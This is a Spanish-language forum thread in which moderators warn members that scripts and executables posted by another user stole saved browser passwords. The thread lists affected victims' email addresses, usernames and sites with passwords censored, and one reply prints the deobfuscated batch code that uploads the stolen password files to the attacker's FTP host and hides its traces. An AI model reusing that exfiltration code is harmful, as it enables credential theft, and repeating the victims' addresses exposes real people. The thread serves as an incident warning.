elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Sugerencias y dudas sobre el Foro (Moderador: el-brujo)
| | |-+  ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas  (Leído 9,702 veces)
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« en: 14 Septiembre 2016, 09:55 am »

Recientemente el usuario leostigma publicó un script en el foro de programación-scripting, y también publicó una serie de archivos executables, que le sirvieron para robar contraseña (mediante un servidor FTP) a los que hayan usado esos archivos.

Por ese motivo, las contraseñas de navegadores de algunos usuarios del foro, sobre todo los habituales en el foro de scripting, han podido ser hackeadas.

Como ya saben, el foro no se hace responsable del contenido que puedan subir los usuarios, solo podemos intentar prevenir que sucedan este tipo de incidentes ...a veces cuando ya es demasiado tarde.

Si alguien del foro descargó su script o executables, debe asegurarse de cambiar su contraseña en los servicios web que esté registrado, sobre todo en servicios importantes como Paypal.



Por mi parte, les intentaré ofrecer la ayuda que pueda en este mensaje.

Estas son (al menos unas de) las cuentas de correo que se han visto afectadas por la infección de este usuario:


Y estos los nombres de usuario con los que se registraron en distintos servicios web:
  • gabo666
  • gabogabo123
  • gabriel rangel
  • gabrielrangel711
  • mrsdax
  • Reikym
  • zando

Aquí pueden ver la lista de páginas web y usuarios que se han visto implicadas (por el momento), he censurado las contraseñas por supuesto:

ACLARACIÓN: Esta lista la he obtenido accediendo al FTP de esta persona, gracias a que otro usuario me informó de este incidente y me proporcionó el user y el pass del FTP.

Citar
Browser:  Google Chrome
 Website:  https://es-la.facebook.com/login.php
 Username: claudiadaniela31@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.linkedin.com/fetch/fetchx-auth-redirect
 Username: c.d.c.r@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://trafficmonsoon.com/login.php
 Username: mrsdax
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://trafficmonsoon.com/login.php
 Username: mrsdax
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: c.d.c.r@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://col430-sec.mail.live.com/mail/AggregationSetupFinished.aspx
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://www.123dreamit.com/accounts/register/
 Username: claudiadaniela31@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://signup.live.com/signup
 Username: gabogabo123
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://reelzhot.com/subscriptions/registrationaff/m-2-panther
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://trafficmonsoon.com/login
 Username: mrsdax
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://www.thepowerlevel.com/silkroad/premium-silk/92-26-2.html
 Username: claudiadaniela31@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://www.goldceo.com/silkroad/premium-silk/92-26-2.html
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://accounts.google.com/SignUp
 Username: gabrielrangel711
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://membercp.joymax.com/SignIn/SignInProperty.aspx
 Username: mrsdax
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://membercp.joymax.com/SignIn/SignInProperty.aspx
 Username: mrsdax
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://projecthax.com/login.php
 Username: zando
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://ic.paypal.com/webapps/checkout/webflow/sparta/expresscheckoutvalidatedataflow
 Username: kevincaballero1405@gmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://projecthax.com/login.php
 Username: zando
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.wtfast.com/member/Account/Login
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.wtfast.com/Account/Create
 Username: claudiadaniela31@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://es-la.facebook.com/login.php
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://m.facebook.com/login/async/
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://foro.ignetwork.net/register.php
 Username: gabo666
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://login.live.com/ppsecure/post.srf
 Username: italy55@outlook.de
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: c.d.c.r@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://us.battle.net/login/es/challenge/8d18a451-7eb4-445d-a78d-8c1d04f1b121
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://accounts.google.com/signin/challenge/sl/password
 Username: kevincaballero1405@gmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://account.leagueoflegends.com/lan/es/protect
 Username: claudiadaniela31@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://earnwithinvite.com/login1.php
 Username: gabriel rangel
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://likesplanet.com/register.php
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.paypal.com/signin
 Username: mc.chumpitaz@gmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://mega.nz/login-to-devnull.html
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.paypal.com/signin
 Username: kevincaballero1405@gmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: acxaelpotter@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.mercadolibre.com/jms/mlv/lgz/login/authenticate
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.crunchyroll.com/freetrial/anime
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.paypal.com/signin
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://www.worldwaronline.com/login/register
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://login.live.com/ppsecure/post.srf
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: gabrielrangel711@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: claudiadaniela31@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://login.live.com/ppsecure/post.srf
 Username: claudiadaniela31@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://www.facebook.com/login.php
 Username: gabrielrangel709@hotmail.com
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  https://cpanel.hostinger.es/website/install-app/app/wordpress/aid/21240506
 Username: Reikym
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://reikym.esy.es/wp-login.php
 Username: Reikym
 Password: **CENSURADO**
---------------------------------------------------------------------------

 Browser:  Google Chrome
 Website:  http://reikym.esy.es/wp-login.php
 Username: Reikym
 Password: **CENSURADO**
---------------------------------------------------------------------------

Un saludo.


« Última modificación: 14 Septiembre 2016, 14:16 pm por Eleкtro » En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.075



Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #1 en: 14 Septiembre 2016, 14:06 pm »

Menos mas que no me fiaba de descargarme el programa lo dije en el mismo post no me daba confianza sin poner un vídeo ni nada y así de sopetón vamos que el tal usuario  leostigma no la ha metido doblada menos mas que a mi no me la metido por que no llegue ha descargarmelo.

Aparte que me escribías por los privados, desde aquí te digo leostigma que a mi no me la vas a dar se la has dado a otros y espero que a los usuarios de este foro que le has robado las contraseñas supuestamente que te denuncien uno por uno para que se te quites las ganas de robar contraseñas a los demás por listillo.

Desde hoy tenemos que tener claro que no podemos descargarnos mas nada de ningún usuario novato aunque venga con buenas intenciones. >:D








« Última modificación: 14 Septiembre 2016, 14:08 pm por El_Andaluz » En línea

MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.465


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #2 en: 14 Septiembre 2016, 14:18 pm »

El script que había publicado inicialmente, tenía una parte ofuscada. Esa parte era la que debería subir la info por ftp.

Dejo aquí la parte ofuscada (ya desofuscada) de su script original, sólo para que lo vean. Pueden apreciar que su intención ya era maligna, pues aparece el ftp, el user y la pass que quería usar:

Código:
...............................................................
echo>> !usb!:informacionftpstart.bat

Timeout /T 2

echo ftp - s:ftpstart.bat>> !usb!:informacionftpstart.bat
echo open ftp.extracto.esY.es>> !usb!:informacionftpstart.bat
echo USUARNAME>> !usb!:informacionftpstart.bat
echo PASSWORD>> !usb!:informacionftps tart.bat
echo put CLAVES*.txt>>!usb!:informacionftpstart.bat
echo bYe>> !usb!:informacionftpstart.bat
echo >> !usb!:informacionstyle.vbs
echo set objshell = createobject("wscript.shell" )>>!usb!:informacionstyle.vbs
echo objshell.run "ftpstart.bat",vbhide>>!usb!:informacionstyle.vbs
attrib -r -h /s /D "!usb!:informacionftpstart.bat"
cd !usb!:informacion
Timeout /T 1
(
ECHO 1d
ECHO e
) | edlin /B style.vbs > nul 1>&0

attrib -r -h /s /D "!usb!:informacionstyle.vbs"
attrib -r -h /s /D "!usb!:informacionSTYLE.BAK"
Timeout /T 2

start !usb!:informacionstyle.vbs
Timeout /T 15
TASKKILL /F /IM ftp.exe

attrib -r -h /s /D "!usb!:informacionstyle.vbs"
attrib -r -h /s /D "!usb!:informacionSTYLE.BAK"
attrib -r -h /s /D "!usb!:informacionftpstart.bat"

del !usb!:informacionstyle.vbs
del !usb!:informacionftpstart.bat
del !usb!:informacionSTYLE.BAK

......................................................................

[ELEKTRO]
He eliminado el nombre de usuario y pass del código, NO ES PLAN de proporcionarle esa información a otros usuarios mal intencionados para que accedan al FTP con esa lista de contraseñas y Paypals ajenos...

« Última modificación: 14 Septiembre 2016, 14:53 pm por MCKSys Argentina » En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

El_Andaluz


Desconectado Desconectado

Mensajes: 4.075



Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #3 en: 14 Septiembre 2016, 14:26 pm »

Yo de verdad es que a veces hay cosas no entiendo, si lo sabíais desde el principio que no era de fiar, lo dije en el mismo post por eso dije si lo habéis probado que casualidad no lo hemos probado ninguno de los que hemos hablado yo por personalmente por que no me fiaba de este usuario y al final he hecho bien por lo que veo.

Y menos mas porque para mi fue descarado el Script vamos que si lo hubiera probado en mi PC se hubiera llevado todas mis contraseñas y menos que no ha sido así.

Pero fallo por partes vuestro por no a ver revisado antes el script si era con mala intención.

Saludos.

« Última modificación: 14 Septiembre 2016, 14:33 pm por El_Andaluz » En línea

MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.465


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #4 en: 14 Septiembre 2016, 14:36 pm »

Yo de verdad es que a veces hay cosas no entiendo si lo sabias desde el principio que no era de fiar lo dije en el mismo post por eso dije si lo habéis probado que casualidad no lo hemos probado ninguno de los que hemos hablado yo por personalmete por que no me fiaba de este usuarios y al final hecho bien.

Y menos mas porque para mi fue descarado el script vamos que si lo hubiera probado en mi PC se hubiera llevado todas mis contraseñas y menos que no ha sido así.

Pero fallo por partes vuestra por no a veo revisado antes el script si era con mala intención.

Saludos.

Sólo desofusqué la primera línea del script. No lo desofusqué todo. Pero dí la forma de desofuscar todo el código. Por eso no pude ver que, en su momento, que el script era malicioso.

Además, no soy "experto" en batch, sólo me defiendo un poco en el tema...  :P

He eliminado el nombre de usuario y pass del código, NO ES PLAN de proporcionarle esa información a otros usuarios mal intencionados para que accedan al FTP con esa lista de contraseñas y Paypals ajenos...

Uf!! Sabía que me había olvidado de algo al subir el script, pero no recordaba qué era!!!!! Menos mal que hay más de 2 ojos mirando los posts...  :)

Saludos!
« Última modificación: 14 Septiembre 2016, 22:14 pm por MCKSys Argentina » En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #5 en: 14 Septiembre 2016, 14:38 pm »

Pero fallo por partes vuestra por no a veo revisado antes el script si era con mala intención.

Nuestra tarea no consiste en analizar todos los códigos y/o aplicaciones que los usuarios publiquen, sino más bien se limitaría a tratar de que ese código se publique en la sección correcta y se haga de la manera adecuada.

En casos donde existe cierta desconfianza por la fuente de un código o aplicación, por supuesto en muchos casos los moderadores (me incluyo) han analizado ese código sospechoso para intentar verificar que no sea malicioso, en algunos casos se a descubierto que si gracias a ese análisis y se han tomado las medidas necesarias con el usuario.

De todas formas, si alguien nos hubiera pedido como favor que analizásemos el código por que no estaba muy seguro de las intenciones del código, yo lo habría desofuscado y analizado, pero como nadie pidió tal cosa (al menos a mi no), yo solo vi un código escrito en Batch al que no le di mayor importancia indiferentemente de la ofuscación ...precisamente por que estaba escrito en Batch y por eso jamás pensé que este personaje fuese tan estúpido como para publicar datos personales en su propio script (el user y el pass de la FTP).

Un saludo!
« Última modificación: 14 Septiembre 2016, 14:42 pm por Eleкtro » En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.075



Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #6 en: 14 Septiembre 2016, 14:43 pm »

Citar
Sólo desofusqué la primera línea del script. No lo desofusqué todo. Pero dí la forma de desofuscar todo el código. Por eso no pude ver que, en su momento, que el script era malicioso.

Además, no soy "experto" en batch, sólo me defiendo un poco en el tema...  :P

La vedad no se que es desosfusqué tampoco entiendo mucho del tema de este tipos de Script pero se supone que existen herramientas para analizarla y ver si hay algo mal intencionado en el Script.

Por que no se ha robado solo las cuentas de los usuarios, que se supone que le han robado hasta las cuentas de los datos bancarios que esto ya si que es grave.

Pero vuelvo a repetir, creo que se podía a ver evitado esto por parte de vosotros los moderadores con esto no digo que tengáis la culpa, porque si es verdad que no nos hacemos responsable de lo que suba cada usuario al foro pero si sois responsable de revisarlo antes o eso creo y pienso que se debería revisar siempre por seguridad.

Saludos.
« Última modificación: 14 Septiembre 2016, 14:47 pm por El_Andaluz » En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #7 en: 14 Septiembre 2016, 14:48 pm »

Pero vuelvo a repetir creo que se podía a ver evitado esto por parte de vosotros los moderadores con esto no digo que tengáis la culpa porque si es verdad que no nos hacemos responsable de lo que suba cada usuario al foro

pero si sois responsable de revisarlo antes o eso creo.

La tarea de un moderador consiste en administrar y clasificar el contenido de un foro, pudiendo ofrecer cierto nivel de seguridad en el contenido que los usuarios descarguen, pero tampoco somos agentes federales del CSI, no estamos aquí para regular todo el contenido que se publique y hacerlo con una lupa en la mano, eso es imposible, vaya, así que la seguridad no siempre es eficaz al 100% y pueden pasar cosas como lo que ha sucedido...

El análisis de archivos es algo opcional, algo que surje de la personalidad o amabilidad del moderador, no de su obligación. En lugar de criticar deberías estarle agradecido a MckSys Argentina :P (ya se que le estás)
De hecho, que yo te haya avisado a ti por mensaje privado, y que yo haya publicado este post de advertencia para los demás usuarios del foro, tampoco entra dentro de mis obligaciones.

Saludos!

« Última modificación: 14 Septiembre 2016, 15:07 pm por Eleкtro » En línea

El_Andaluz


Desconectado Desconectado

Mensajes: 4.075



Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #8 en: 14 Septiembre 2016, 15:07 pm »

Citar
El análisis de archivos es algo opcional, algo que surje de la personalidad o amabilidad del moderador, no de su obligación, en este y en todos los foros, vaya. En lugar de criticar deberías estarle agradecido a MckSys Argentina :P (ya se que le estás)


En verdad te estoy criticando a ti que se supone que sabes mas del tema  :xD :P

Yo creo que debería ser algo obligatorio en los foros y mas en este de revisarse los códigos de los Scritp que cada usuario suba por lo menos analizarlos.

Y por cierto te lo he agradecido por privado que me hayas avisado.


Saludos.
« Última modificación: 14 Septiembre 2016, 15:11 pm por El_Andaluz » En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas
« Respuesta #9 en: 14 Septiembre 2016, 15:10 pm »

En verdad te estoy criticando a ti que se supone que sabes mas del tema  :xD :P

No es cuestión de saber o no, me confié, simplemente vi un script escrito en Batch y no le di importancia por que es un lenguaje digamos muy... limitado, y vi que estaba ofuscado, pero pensé que el autor del código simplemente lo quiso ofuscar para que las personas inexpertas no pudieran reproducir su tecnica y "robarle" el trabajo que hizo, así que ignoré ese código sin pensar que pudiera ser malicioso.

¿Que fue un error confiar en eso?, si, lo fue, pero ya pasó y yo no tengo la culpa.

Saludos!
« Última modificación: 14 Septiembre 2016, 15:14 pm por Eleкtro » En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines